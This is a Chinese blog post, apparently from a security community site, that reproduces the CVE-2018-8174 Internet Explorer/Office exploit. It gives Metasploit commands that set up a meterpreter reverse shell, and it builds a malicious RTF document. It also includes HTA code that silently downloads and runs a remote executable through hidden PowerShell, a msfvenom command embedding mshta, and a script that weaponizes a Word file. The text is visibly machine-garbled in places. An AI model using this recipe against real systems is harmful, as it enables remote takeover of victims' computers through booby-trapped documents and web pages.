KALI_LINUX

CVE-2018-8174 绝杀漏洞复现 我再给你个网址你敢访问吗

最近360中心平安事业部初级要挟应对团队在全球范围内率先监控到了一例运用0day破绽的APT攻击,捕捉到了全球首例应用阅读器0day破绽的新型Office文档攻击,我们将该破绽命名爲“双杀”破绽。该破绽影响最新版本的IE阅读器及运用了IE内核的使用顺序。用户在阅读网页或翻开Office文档时都能够中招,最终被黑客植入后门木马完全控制电脑。

POC验证

未打补丁零碎,IE阅读器翻开此地址会弹出计算器 。

metasploit 复现

下载 metasploit 模块到本地

git clone https://github.com/0x09AL/CVE-2018-8174-msf.git

将CVE-2018-8174.rb复制到 fileformat 目录

cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

将CVE-2018-8174.rtf复制到 exploits 目录

cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/

启动 metasploit

use exploit/windows/fileformat/CVE-2018-8174
set PAYLOAD windows/meterpreter/reverse_tcp
set srvhost 192.168.0.116
set lhost 192.168.0.116
exploit

复制 /root/.msf4/local/目录中的 msf.rtf 文件到目的主机上运用word文档翻开
或许IE阅读器翻开 http://192.168.0.116:8080 即可取得会话

自定义下载者 复现

应用 mshta 从近程效劳器下载文件执行。

请先下载poc附件,下文中运用 链接:https://pan.baidu.com/s/14vP4CMdjEKkRdHBb7vLSHg 密码:ci8h

1.结构HTA文件,当拜访hta文件就会触发powershell下载文件至暂时目录执行

预备你的xx.exe文件上传至站点目录,假设失掉地址 http://xxx.com/xxx.exe

HTA代码:

<script>
a=new ActiveXObject("WScript.Shell");
a.run('%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile(\'http://xxx.com/xxx.exe\', \'c:/windows/temp/xxx.exe\'); c:/windows/temp/xxx.exe', 0);window.close();
</script>

把该文件命名 8174.hta 上传至站点目录;假如得到地址 http://xxx.lr3800.com/8174.hta

2.使用msfvenom生成 js Shellcode

msfvenom -p windows/exec cmd='mshta http://xxx.lr3800.com/8174.hta' -f js_le exitfunc=thread -a x86

把生成的Shellcode字符替换至 8174poc.html 166行代码

46cdbb714b067c132fda956e3e515c64.png

把 8174poc.html 文件上传至站点目录 假如得到地址 http://xxx.lr3800.com/8174poc.html

3.生成Word文档

* 下载python脚本保存本地

git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

运行 CVE-2018-8174.py

python CVE-2018-8174.py -u http://xxx.lr3800.com/8174poc.html -o exp.rtf

得到目录中的 “exp.rtf ”文件,使用Word文档打开即可下载执行xx.exe文件,或者IE浏览器打开 http://xxx.lr3800.com/8174poc.html 即可下载执行xx.exe文件

样本演示运行效果 https://app.any.run/tasks/3c52b2b2-3fb7-42ff-a3bf-14429b17b112

(3)

本文由 SAFEING 极客社区 作者:root 发表,转载请注明来源!

热评文章

发表评论